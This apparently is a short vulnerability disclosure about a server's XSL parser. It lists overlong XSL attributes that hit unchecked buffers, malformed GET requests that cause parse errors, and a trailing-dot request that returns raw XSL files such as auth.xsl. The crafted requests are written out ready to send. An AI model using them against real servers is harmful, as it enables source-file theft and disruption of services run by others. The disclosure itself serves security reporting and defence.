- The XSL parser has some unchecked buffers (local),but they dont seem
to be exploitable. If they are, they can be used for priviledge escalation,
under the user that the server runs.
<xsl:when test="<lots of chars>"></xsl:when>
<xsl:if test="<lots of chars>"></xsl:if>
<xsl:value-of select="<lots of chars>" />
- Cause XSL parser error "Could not parse XSLT file". (Not very useful).
GET /status.xsl> HTTP/1.0
GET /status.xsl< HTTP/1.0
GET /<status.xsl HTTP/1.0
- XSL parser bypass. (Useful to steal customized XSL files, lol).
GET /auth.xsl. HTTP/1.0
GET /status.xsl. HTTP/1.0